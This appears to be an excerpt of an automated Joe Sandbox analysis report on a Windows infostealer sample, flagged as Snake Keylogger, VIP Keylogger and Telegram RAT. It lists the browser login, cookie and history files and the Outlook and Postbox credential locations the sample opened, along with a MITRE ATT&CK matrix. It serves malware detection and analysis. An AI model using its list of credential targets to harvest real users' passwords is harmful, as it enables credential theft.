Source: Yara match	File source: 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: acrorrheuma.exe	Binary or memory string: WIN_81
Source: acrorrheuma.exe	Binary or memory string: WIN_XP
Source: acrorrheuma.exe	Binary or memory string: WIN_XPe
Source: acrorrheuma.exe	Binary or memory string: WIN_VISTA
Source: acrorrheuma.exe	Binary or memory string: WIN_7
Source: acrorrheuma.exe	Binary or memory string: WIN_8
Source: acrorrheuma.exe, 00000009.00000002.1424287594.0000000000554000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: acrorrheuma.exe PID: 7212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E16283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	3_2_00E16283
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E16747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_00E16747
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00516283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	6_2_00516283
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00516747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_00516747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	31 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	231 Security Software Discovery	SSH	4 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report drRbNknjyb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
drRbNknjyb.exe